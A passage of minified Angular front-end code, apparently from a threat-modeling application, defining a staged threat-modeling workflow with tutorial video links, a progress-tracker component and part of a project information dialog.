?null:i.selectedNode.data)("selectedObject",i.selectedObject))},styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.tab-icon[_ngcontent-%COMP%]{margin-right:8px}.bottomTabGroup[_ngcontent-%COMP%]{height:100%}.bottomTabGroup[_ngcontent-%COMP%]     .mat-tab-header .mat-tab-labels .mat-tab-label{height:25px}.bottomTabGroup[_ngcontent-%COMP%]     .mat-tab-labels .mat-tab-label{min-width:160px!important}.mat-badge-small.mat-badge-below[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{bottom:0}.mat-badge-small.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:-20px}.topTabGroup[_ngcontent-%COMP%]     .mat-tab-labels .mat-tab-label{padding:0 0 0 3px!important;min-width:none!important}"]}),t})(),x5=(()=>{class t{constructor(e){this.translate=e,this.translate.onLangChange.subscribe(i=>this.initialize())}get Stages(){return this.stages||this.initialize(),this.stages}initialize(){if(0==Object.keys(this.translate.translations).length)return;let e={name:"Analyze",desc:"What are we working on?",icon:"create",steps:[{number:1,name:"Device Characterization & Scope Defintion [Optional]",link:"modeling?tab="+aa.CharScope,activities:[{name:this.translate.instant("ttm.1.1.n"),desc:this.translate.instant("ttm.1.1.d")},{name:this.translate.instant("ttm.1.2.n"),desc:this.translate.instant("ttm.1.2.d")},{name:this.translate.instant("ttm.1.3.n"),desc:this.translate.instant("ttm.1.3.d")}]},{number:2,name:"Business Objectives and Impact Definition [Optional]",link:"modeling?tab="+aa.ObjImpact,activities:[{name:this.translate.instant("ttm.2.1.n"),desc:this.translate.instant("ttm.2.1.d")},{name:this.translate.instant("ttm.2.2.n"),desc:this.translate.instant("ttm.2.2.d")}]},{number:3,name:"Device Interaction Analysis [Optional]",activities:[{name:this.translate.instant("ttm.3.1.n"),desc:this.translate.instant("ttm.3.1.d"),link:"modeling?tab="+aa.Context},{name:this.translate.instant("ttm.3.2.n"),desc:this.translate.instant("ttm.3.2.d")},{name:this.translate.instant("ttm.3.3.n"),desc:this.translate.instant("ttm.3.3.d"),link:"modeling?tab="+aa.UseCase},{name:this.translate.instant("ttm.3.4.n"),desc:this.translate.instant("ttm.3.4.d")}],video:"https://youtu.be/P7-ca-gteXk"},{number:4,name:"Asset Identification",activities:[{name:this.translate.instant("ttm.4.1.n"),desc:this.translate.instant("ttm.4.1.d"),link:"modeling?tab="+aa.Assets},{name:this.translate.instant("ttm.4.2.n"),desc:this.translate.instant("ttm.4.2.d")}],video:"https://youtu.be/a6QiOJZrjS0"}]},i={name:"Model",desc:"What can go wrong?",icon:"architecture",steps:[{number:5,name:"Threat and Threat Source Identification",activities:[{name:this.translate.instant("ttm.5.1.n")+" [Optional]",desc:this.translate.instant("ttm.5.1.d"),link:"modeling?tab="+aa.ThreatSources},{name:this.translate.instant("ttm.5.2.n"),desc:this.translate.instant("ttm.5.2.d"),link:"modeling?tab="+aa.SystemThreats},{name:this.translate.instant("ttm.5.3.n")+" [Optional]",desc:this.translate.instant("ttm.5.3.d"),link:"configuration"}],video:"https://youtu.be/w6Z-trl4_SE"},{number:6,name:"Hardware Threat Modeling",link:"modeling?tab="+aa.Hardware,activities:[{name:this.translate.instant("ttm.6.1.n"),desc:this.translate.instant("ttm.6.1.d")},{name:this.translate.instant("ttm.6.2.n"),desc:this.translate.instant("ttm.6.2.d")+"\nhttps://youtu.be/MbrC1sGo6L8"}],video:"https://youtu.be/dKDiEc7K2pY"},{number:7,name:"Software Threat Modeling",link:"modeling?tab="+aa.Software,activities:[{name:this.translate.instant("ttm.7.1.n"),desc:this.translate.instant("ttm.7.1.d")},{name:this.translate.instant("ttm.7.2.n"),desc:this.translate.instant("ttm.7.2.d")+"\nhttps://youtu.be/MbrC1sGo6L8"}],video:"https://youtu.be/znWcbMUviGY"},{number:8,name:"Use Case Threat Modeling",link:"modeling?tab="+aa.Dataflow,activities:[{name:this.translate.instant("ttm.8.1.n"),desc:this.translate.instant("ttm.8.1.d")},{name:this.translate.instant("ttm.8.2.n"),desc:this.translate.instant("ttm.8.2.d")+"\nhttps://youtu.be/MbrC1sGo6L8"}],video:"https://youtu.be/dKDiEc7K2pY"},{number:9,name:"Process Threat Modeling",link:"modeling?tab="+aa.Process,activities:[{name:this.translate.instant("ttm.9.1.n"),desc:this.translate.instant("ttm.9.1.d")},{name:this.translate.instant("ttm.9.2.n"),desc:this.translate.instant("ttm.9.2.d")+"\nhttps://youtu.be/MbrC1sGo6L8"}],video:"https://youtu.be/znWcbMUviGY"},{number:10,name:"Vulnerability Review & Penetration Testing",activities:[{name:this.translate.instant("ttm.10.1.n"),desc:this.translate.instant("ttm.10.1.d")},{name:this.translate.instant("ttm.10.2.n"),desc:this.translate.instant("ttm.10.2.d")+"\nhttps://youtu.be/MbrC1sGo6L8"}]}]},n={name:"Mitigate",desc:"What are we going to do about it?",icon:"security",steps:[{number:11,name:"Risk Assessment",link:"dashboard",activities:[{name:this.translate.instant("ttm.11.1.n"),desc:this.translate.instant("ttm.11.1.d")},{name:this.translate.instant("ttm.11.2.n"),desc:this.translate.instant("ttm.11.2.d")}],video:"https://youtu.be/MbrC1sGo6L8"},{number:12,name:"Countermeasure Defintion",activities:[{name:this.translate.instant("ttm.12.1.n"),desc:this.translate.instant("ttm.12.1.d"),link:"dashboard"},{name:this.translate.instant("ttm.12.2.n"),desc:this.translate.instant("ttm.12.2.d"),link:"mitigation"},{name:this.translate.instant("ttm.12.3.n"),desc:this.translate.instant("ttm.12.3.d")}],video:"https://youtu.be/pFhpct9iGUc"}]},r={name:"Validate",desc:"Did we do a good enough job?",icon:"fact_check",steps:[{number:13,name:"Validation & Documentation",activities:[{name:this.translate.instant("ttm.13.1.n"),desc:this.translate.instant("ttm.13.1.d")},{name:this.translate.instant("ttm.13.2.n"),desc:this.translate.instant("ttm.13.2.d")},{name:this.translate.instant("ttm.13.3.n"),desc:this.translate.instant("ttm.13.3.d")},{name:this.translate.instant("ttm.13.4.n"),desc:this.translate.instant("ttm.13.4.d")}]}]};this.stages=[e,i,n,r]}}return t.\u0275fac=function(e){return new(e||t)(At(Sn))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function wSe(t,a){1&t&&(m(0,"p",3),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct("\n  ",re(2,1,"dialog.progress.noProject"),"\n"))}function ISe(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(n){be(e);const r=B().$implicit;return B(2).NavigateTo(r.link),Me(n.stopPropagation())}),oe(1,"translate"),s(2,"\n        "),m(3,"mat-icon"),s(4,"open_in_new"),u(),s(5,"\n      "),u()}2&t&&at("matTooltip",re(1,1,"general.openInNew"))}function RSe(t,a){if(1&t){const e=Ye();m(0,"button",22),he("click",function(){be(e);const n=B().$implicit;return Me(B(2).OnVideoClick(n))}),s(1,"\n        "),m(2,"mat-icon"),s(3,"smart_display"),u(),s(4,"\n      "),u()}2&t&&at("matTooltip",B().$implicit.video)}function SSe(t,a){if(1&t){const e=Ye();m(0,"td",23),s(1,"\n            "),m(2,"mat-checkbox",24),he("ngModelChange",function(n){const c=be(e).$implicit,d=B().$implicit,T=B().$implicit,k=B();return Me(k.Tracker[k.GetActivityKey(T,d,c)]=n)}),u(),s(3,"\n          "),u()}if(2&t){const e=a.$implicit,i=B().$implicit,n=B().$implicit,r=B();C(2),V("ngModel",r.Tracker[r.GetActivityKey(n,i,e)])}}function kSe(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(n){be(e);const r=B().$implicit;return B(3).NavigateTo(r.link),Me(n.stopPropagation())}),oe(1,"translate"),s(2,"\n              "),m(3,"mat-icon"),s(4,"open_in_new"),u(),s(5,"\n            "),u()}2&t&&at("matTooltip",re(1,1,"general.openInNew"))}function PSe(t,a){if(1&t){const e=Ye();m(0,"td",25),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnEntryClick(r))}),s(1),ne(2,kSe,6,3,"button",7),s(3,"\n          "),u()}if(2&t){const e=a.$implicit;C(1),ct("\n            ",e.name,"\n            "),C(1),V("ngIf",e.link)}}function OSe(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(){be(e);const n=B().$implicit;return Me(B(3).OnVideoClick(n))}),s(1,"\n              "),m(2,"mat-icon"),s(3,"smart_display"),u(),s(4,"\n            "),u()}2&t&&at("matTooltip",B().$implicit.video)}function NSe(t,a){if(1&t){const e=Ye();m(0,"td",26),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnVideoClick(r))}),s(1,"\n            "),ne(2,OSe,5,1,"button",7),s(3,"\n          "),u()}if(2&t){const e=a.$implicit;C(2),V("ngIf",(null==e.video?null:e.video.length)>0)}}function LSe(t,a){1&t&&(m(0,"mat-icon"),s(1,"info"),u())}function zSe(t,a){if(1&t){const e=Ye();m(0,"td",26),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnEntryClick(r))}),ne(1,LSe,2,0,"mat-icon",27),u()}if(2&t){const e=a.$implicit;C(1),V("ngIf",(null==e.desc?null:e.desc.length)>0)}}function WSe(t,a){if(1&t&&(m(0,"td",28),s(1,"\n            "),m(2,"div",29),s(3,"\n              "),m(4,"p",30),s(5),u(),s(6,"\n            "),u(),s(7,"\n          "),u()),2&t){const e=a.$implicit,i=B(3);Rt("colspan",i.columnsToDisplay.length),C(2),V("@detailExpand",e==i.expandedActivity?"expanded":"collapsed"),C(3),ke(e.desc)}}function FSe(t,a){1&t&&(m(0,"tr",31),s(1,"\n        "),u())}function VSe(t,a){1&t&&it(0,"tr",32)}const BSe=function(){return["expandedDetail"]};function HSe(t,a){if(1&t&&(m(0,"div"),s(1),ne(2,ISe,6,3,"button",7),s(3,"\n      "),ne(4,RSe,5,1,"button",8),s(5,"\n      "),it(6,"br"),s(7,"\n      "),m(8,"table",9),s(9,"\n        "),bt(10,10),s(11,"\n          "),ne(12,SSe,4,1,"td",11),s(13,"\n        "),Mt(),s(14,"\n        "),bt(15,12),s(16,"\n          "),ne(17,PSe,4,2,"td",13),s(18,"\n        "),Mt(),s(19,"\n        "),bt(20,14),s(21,"\n          "),ne(22,NSe,4,1,"td",15),s(23,"\n        "),Mt(),s(24,"\n        "),bt(25,16),s(26,"\n          "),ne(27,zSe,2,1,"td",15),s(28,"\n        "),Mt(),s(29,"\n      \n        "),s(30,"\n        "),bt(31,17),s(32,"\n          "),ne(33,WSe,8,3,"td",18),s(34,"\n        "),Mt(),s(35,"\n      \n        "),ne(36,FSe,2,0,"tr",19),s(37,"\n        "),ne(38,VSe,1,0,"tr",20),s(39,"\n      "),u(),s(40,"\n    "),u()),2&t){const e=a.$implicit,i=B(2);C(1),za("\n      ",e.number,". ",e.name,"\n      "),C(1),V("ngIf",e.link),C(2),V("ngIf",(null==e.video?null:e.video.length)>0),C(4),V("dataSource",e.activities),C(28),V("matRowDefColumns",i.columnsToDisplay),C(2),V("matRowDefColumns",kr(7,BSe))}}function USe(t,a){if(1&t){const e=Ye();m(0,"button",33),he("click",function(){return be(e),Me(B(2).PrevProcessStep())}),s(1),oe(2,"translate"),u()}2&t&&(C(1),ke(re(2,1,"tour.prev")))}function qSe(t,a){if(1&t){const e=Ye();m(0,"button",33),he("click",function(){return be(e),Me(B(2).NextProcessStep())}),s(1),oe(2,"translate"),u()}2&t&&(C(1),ke(re(2,1,"tour.next")))}function GSe(t,a){if(1&t){const e=Ye();m(0,"button",33),he("click",function(){return be(e),Me(B(2).NextProcessStep())}),s(1),oe(2,"translate"),u()}2&t&&(C(1),ke(re(2,1,"tour.end")))}function jSe(t,a){if(1&t){const e=Ye();m(0,"mat-expansion-panel",4),he("opened",function(){const r=be(e).index;return Me(B().SetProcessStep(r))}),s(1,"\n    "),m(2,"mat-expansion-panel-header"),s(3,"\n      "),m(4,"mat-panel-title"),s(5),u(),s(6,"\n      "),m(7,"mat-panel-description"),s(8),oe(9,"translate"),m(10,"mat-icon"),s(11),u(),s(12,"\n      "),u(),s(13,"\n    "),u(),s(14,"\n\n    "),ne(15,HSe,41,8,"div",5),s(16,"\n    "),m(17,"mat-action-row"),s(18,"\n      "),ne(19,USe,3,3,"button",6),s(20,"\n      "),ne(21,qSe,3,3,"button",6),s(22,"\n      "),ne(23,GSe,3,3,"button",6),s(24,"\n    "),u(),s(25,"\n  "),u()}if(2&t){const e=a.$implicit,i=a.index,n=a.first,r=a.last,c=B();V("expanded",c.processStep===i),C(5),ct("\n        ",e.name,"\n      "),C(3),J_("\n        ",re(9,10,"dialog.progress.Steps"),": ",c.GetCheckedCount(e),"/",c.GetActivityCount(e),"\n        "),C(3),ke(e.icon),C(4),V("ngForOf",e.steps),C(4),V("ngIf",!n),C(2),V("ngIf",!r),C(2),V("ngIf",r)}}let WG=(()=>{class t{constructor(e,i,n){this.dataService=e,this.ttmService=i,this.router=n,this.step=0,this.tracker={},this.columnsToDisplay=["check","desc","video","info"]}get Stages(){return this.ttmService.Stages}get processStep(){return this.dataService.Project?null==this.dataService.Project.ProgressStep?0:this.dataService.Project.ProgressStep:this.step}set processStep(e){this.dataService.Project?this.dataService.Project.ProgressStep=e:this.step=e}get Tracker(){return this.dataService.Project?this.dataService.Project.ProgressTracker:this.tracker}ngOnInit(){let e=()=>{this.dataService.Project&&this.Stages.forEach(i=>{i.steps.forEach(n=>{n.activities.forEach(r=>{let c=this.GetActivityKey(i,n,r);null==this.Tracker[c]&&(this.Tracker[c]=!1)})})})};e(),this.dataService.ProjectChanged.subscribe(i=>e())}GetCheckedCount(e){let i=Object.keys(this.Tracker).filter(r=>r.startsWith(this.Stages.indexOf(e).toString())),n=0;return i.forEach(r=>{1==this.Tracker[r]&&n++}),n}GetActivityCount(e){return e.steps.reduce((i,n)=>i+n.activities.length,0)}GetActivityKey(e,i,n){return this.Stages.indexOf(e)+"."+e.steps.indexOf(i)+"."+i.activities.indexOf(n)}OnEntryClick(e){var i;(null===(i=e.desc)||void 0===i?void 0:i.length)>0&&(this.expandedActivity=this.expandedActivity===e?null:e)}OnVideoClick(e){window.open(e.video,"_blank")}SetProcessStep(e){this.processStep=e}NextProcessStep(){this.processStep++}PrevProcessStep(){this.processStep--}NavigateTo(e){if(!e)return;let i=e.split("?"),n={};for(let r=1;r<i.length;r++){let c=i[r].split("=");n[c[0]]=c[1]}this.router.navigate([i[0]],{queryParams:n})}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(x5),Ee(Oo))},t.\u0275cmp=Wt({type:t,selectors:[["app-progress-tracker"]],decls:6,vars:2,consts:[["style","color: #faff00;",4,"ngIf"],[1,"expansion-panel-headers-align"],["hideToggle","","style","width: 600px;",3,"expanded","opened",4,"ngFor","ngForOf"],[2,"color","#faff00"],["hideToggle","",2,"width","600px",3,"expanded","opened"],[4,"ngFor","ngForOf"],["mat-button","","color","primary",3,"click",4,"ngIf"],["mat-button","","class","toolBtn","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["mat-button","","class","toolBtn","style","float: right; margin-right: 20px;","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["mat-table","","multiTemplateDataRows","",3,"dataSource"],["matColumnDef","check"],["mat-cell","","style","width: 34px;",4,"matCellDef"],["matColumnDef","desc"],["mat-cell","",3,"click",4,"matCellDef"],["matColumnDef","video"],["mat-cell","","style","text-align: right;",3,"click",4,"matCellDef"],["matColumnDef","info"],["matColumnDef","expandedDetail"],["mat-cell","",4,"matCellDef"],["mat-row","","class","activity-row",4,"matRowDef","matRowDefColumns"],["mat-row","","class","activity-detail-row",4,"matRowDef","matRowDefColumns"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"matTooltip","click"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",2,"float","right","margin-right","20px",3,"matTooltip","click"],["mat-cell","",2,"width","34px"],["color","primary",2,"vertical-align","super",3,"ngModel","ngModelChange"],["mat-cell","",3,"click"],["mat-cell","",2,"text-align","right",3,"click"],[4,"ngIf"],["mat-cell",""],[1,"activity-detail"],[2,"white-space","pre-wrap"],["mat-row","",1,"activity-row"],["mat-row","",1,"activity-detail-row"],["mat-button","","color","primary",3,"click"]],template:function(e,i){1&e&&(ne(0,wSe,3,3,"p",0),s(1,"\n"),m(2,"mat-accordion",1),s(3,"\n  "),ne(4,jSe,26,12,"mat-expansion-panel",2),s(5,"\n"),u()),2&e&&(V("ngIf",!i.dataService.Project),C(4),V("ngForOf",i.Stages))},dependencies:[Zi,Ri,Ta,Ea,oa,br,da,Pa,tl,Ec,E8,Dc,el,Il,Au,xm,Dm,Du,wm,xc,Xi],styles:["table[_ngcontent-%COMP%]{width:100%}tr.activity-detail-row[_ngcontent-%COMP%]{height:0}.activity-row[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{border-bottom-width:0}.activity-detail[_ngcontent-%COMP%]{overflow:hidden;display:flex}.activity-description[_ngcontent-%COMP%]{padding:16px}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}"],data:{animation:[ar("detailExpand",[sn("collapsed",zi({height:"0px",minHeight:"0"})),sn("expanded",zi({height:"*"})),gn("expanded <=> collapsed",En("225ms cubic-bezier(0.4, 0.0, 0.2, 1)"))])]}}),t})();var FG=de(5689);function $Se(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n        ",re(1,1,"dialog.modelinfo.general"),"\n      ")}function KSe(t,a){if(1&t){const e=Ye();m(0,"div",32),s(1,"\n                  "),m(2,"button",33),he("click",function(){return be(e),Me(B(3).Project.Image="")}),s(3,"\n                    "),m(4,"mat-icon"),s(5,"remove"),u(),s(6,"\n                  "),u(),s(7,"\n                "),u()}if(2&t){B();const e=Ti(34);ri("left",B(2).GetRemoveBtnLeft(e))}}function XSe(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",34),he("click",function(){const r=be(e).$implicit;return Me(B(3).selectedUser=r)}),s(1,"\n                  "),m(2,"mat-icon",35),s(3,"person"),u(),s(4,"\n                  "),m(5,"div",36),s(6),u(),s(7,"\n                  "),m(8,"div",36)(9,"a",37),s(10),u()(),s(11,"\n                  "),m(12,"button",38),he("click",function(){const r=be(e).$implicit;return Me(B(3).DeleteUser(r))}),oe(13,"translate"),m(14,"mat-icon"),s(15,"delete"),u()(),s(16,"\n                "),u()}if(2&t){const e=a.$implicit,i=B(3);Ct("highlight-light",i.selectedUser===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedUser===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.Name),C(3),V("href","mailto:"+e.Email,nm),C(1),ke(e.Email),C(2),at("matTooltip",re(13,9,"general.Delete"))}}function YSe(t,a){if(1&t){const e=Ye();m(0,"button",43),he("click",function(){return be(e),Me(B(4).selectedUser.Name="")}),oe(1,"translate"),s(2,"\n                    "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n                  "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function JSe(t,a){if(1&t){const e=Ye();m(0,"div",39),s(1,"\n                "),m(2,"mat-form-field",40),s(3,"\n                  "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n                  "),m(8,"input",10),he("ngModelChange",function(n){return be(e),Me(B(3).selectedUser.Name=n)}),u(),s(9,"\n                  "),ne(10,YSe,6,3,"button",41),s(11,"\n                "),u(),s(12,"\n                "),it(13,"br"),s(14,"\n                "),m(15,"mat-form-field",40),s(16,"\n                  "),m(17,"mat-label"),s(18),oe(19,"translate"),u(),s(20,"\n                  "),m(21,"input",42),he("ngModelChange",function(n){return be(e),Me(B(3).selectedUser.Email=n)}),u(),s(22,"\n                "),u(),s(23,"\n              "),u()}if(2&t){const e=B(3);C(5),ke(re(6,6,"properties.Name")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedUser.Name),C(2),V("ngIf",e.selectedUser.Name),C(8),ke(re(19,8,"properties.Email")),C(3),V("ngModel",e.selectedUser.Email)}}function ZSe(t,a){if(1&t){const e=Ye();m(0,"tr"),s(1,"\n                    "),m(2,"td",46),s(3),u(),s(4,"\n                    "),m(5,"td"),s(6),oe(7,"localDateTime"),u(),s(8,"\n                    "),m(9,"td"),s(10,"-"),u(),s(11,"\n                    "),m(12,"td"),s(13),u(),s(14,"\n                    "),m(15,"td"),s(16,":"),u(),s(17,"\n                    "),m(18,"td"),s(19),m(20,"button",47),he("click",function(){const r=be(e).$implicit;return Me(B(5).dataService.RestoreCommit(r))}),oe(21,"translate"),s(22,"\n                        "),m(23,"mat-icon"),s(24,"restore"),u(),s(25,"\n                      "),u(),s(26,"\n                    "),u(),s(27,"\n                  "),u()}if(2&t){const e=a.$implicit,i=a.index,n=a.count;C(3),ct("",n-i,")"),C(3),ke(re(7,5,e.date)),C(7),ke(e.commiter),C(6),ct("\n                      ",e.message,"\n                      "),C(1),at("matTooltip",re(21,7,"dialog.modelinfo.Restore"))}}function eke(t,a){if(1&t&&(s(0,"\n                "),m(1,"table"),s(2,"\n                  "),ne(3,ZSe,28,9,"tr",45),s(4,"\n                "),u(),s(5,"\n              ")),2&t){const e=B(4);C(3),V("ngForOf",e.commits)}}function tke(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n              "),m(2,"mat-expansion-panel-header"),s(3,"\n                "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n                "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"history"),u(),s(12,"\n                "),u(),s(13,"\n              "),u(),s(14,"\n              "),ne(15,eke,6,1,"ng-template",44),s(16,"\n            "),u()),2&t){const e=B(3);C(5),ct("\n                  ",re(6,2,"dialog.modelinfo.History"),"\n                "),C(4),ct("\n                  ",e.GHProject.name,"\n                  ")}}function ike(t,a){if(1&t){const e=Ye();s(0,"\n        "),m(1,"h3"),s(2),u(),s(3,"\n        "),m(4,"div"),s(5,"\n          "),m(6,"div",6),s(7,"\n            "),m(8,"div",7),s(9,"\n              "),m(10,"mat-form-field",8),s(11,"\n                "),m(12,"mat-label"),s(13),oe(14,"translate"),u(),s(15,"\n                "),m(16,"textarea",9),he("ngModelChange",function(n){return be(e),Me(B(2).Project.Description=n)}),u(),s(17,"\n              "),u(),s(18,"\n              "),m(19,"mat-form-field",8),s(20,"\n                "),m(21,"mat-label"),s(22),oe(23,"translate"),u(),s(24,"\n                "),m(25,"input",10),he("ngModelChange",function(n){return be(e),Me(B(2).Project.UserVersion=n)}),u(),s(26,"\n              "),u(),s(27,"\n            "),u(),s(28,"\n            "),m(29,"div",11),s(30,"\n              "),m(31,"div",12),s(32,"\n                "),m(33,"img",13,14),he("click",function(){be(e);const n=B(2);return Me(n.ViewImage(n.Project.Image))}),u(),s(35,"\n                "),m(36,"input",15,16),he("change",function(n){return be(e),Me(B(2).OnFileSelected(n))}),u(),s(38,"\n                "),ne(39,KSe,8,2,"div",17),s(40,"\n                "),m(41,"div",18),s(42,"\n                  "),m(43,"button",19),he("click",function(){return be(e),Me(Ti(37).click())}),s(44,"\n                    "),m(45,"mat-icon"),s(46,"add_photo_alternate"),u(),s(47,"\n                  "),u(),s(48,"\n                "),u(),s(49,"\n              "),u(),s(50,"\n            "),u(),s(51,"\n          "),u(),s(52,"\n          "),m(53,"div",6),s(54,"\n            "),m(55,"div",20),s(56,"\n              "),m(57,"mat-list",21),s(58,"\n                "),m(59,"div",22),s(60),oe(61,"translate"),m(62,"button",23),he("click",function(){return be(e),Me(B(2).AddUser())}),oe(63,"translate"),m(64,"mat-icon"),s(65,"add"),u()()(),s(66,"\n                "),ne(67,XSe,17,11,"mat-list-item",24),s(68,"\n              "),u(),s(69,"\n            "),u(),s(70,"\n            "),m(71,"div",25),s(72,"\n              "),ne(73,JSe,24,10,"div",26),s(74,"\n            "),u(),s(75,"\n          "),u(),s(76,"\n        "),u(),s(77,"\n        "),m(78,"div"),s(79,"\n          "),m(80,"h4"),s(81),oe(82,"translate"),u(),s(83,"\n          "),m(84,"div",27),s(85,"\n            "),m(86,"mat-slide-toggle",28),he("change",function(n){return be(e),Me(B(2).OnTestingChanged(n))}),s(87),oe(88,"translate"),u(),s(89,"\n            "),it(90,"br"),s(91,"\n            "),m(92,"mat-slide-toggle",29),he("ngModelChange",function(n){return be(e),Me(B(2).Project.Settings.ThreatActorToAttackScenario=n)}),s(93),oe(94,"translate"),u(),s(95,"\n          "),u(),s(96,"\n        "),u(),s(97,"\n        "),m(98,"div"),s(99,"\n          "),m(100,"mat-accordion",30),s(101,"\n            "),ne(102,tke,17,4,"mat-expansion-panel",31),s(103,"\n          "),u(),s(104,"\n        "),u(),s(105,"\n      ")}if(2&t){const e=B(2);C(2),ke(e.Project.Name),C(11),ke(re(14,23,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.Project.Description),C(6),ke(re(23,25,"properties.Version")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.Project.UserVersion),C(8),V("src",e.Project.Image,nm),C(6),V("ngIf",e.Project.Image),C(18),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),ct("",re(61,27,"properties.Participants")," "),C(2),at("matTooltip",re(63,29,"general.Add")),C(5),V("ngForOf",e.Project.Participants),C(6),V("ngIf",e.selectedUser),C(8),ke(re(82,31,"general.Settings")),C(5),V("checked",e.Project.HasTesting),C(1),ke(re(88,33,"general.TestCases")),C(5),V("ngModel",e.Project.Settings.ThreatActorToAttackScenario),C(1),ke(re(94,35,"dialog.modelinfo.ThreatSourceToAttackScenario")),C(9),V("ngIf",e.GHProject)}}function ake(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n        ",re(1,1,"status-bar.TasksAndNotes"),"\n      ")}function nke(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n        ",re(1,1,"dialog.modelchanges.Changes"),"\n      ")}function oke(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n        ",re(1,1,"dialog.progress.title"),"\n      ")}function rke(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1,"\n  "),m(2,"mat-tab-group",2),he("selectedIndexChange",function(n){return be(e),Me(B().SetSelectedTabIndex(n))})("selectedTabChange",function(){return be(e),Me(Ti(23).UpdateChanges())}),s(3,"\n    "),m(4,"mat-tab"),s(5,"\n      "),ne(6,$Se,2,3,"ng-template",3),s(7,"\n      "),ne(8,ike,106,37,"ng-template",4),s(9,"\n    "),u(),s(10,"\n    "),m(11,"mat-tab"),s(12,"\n      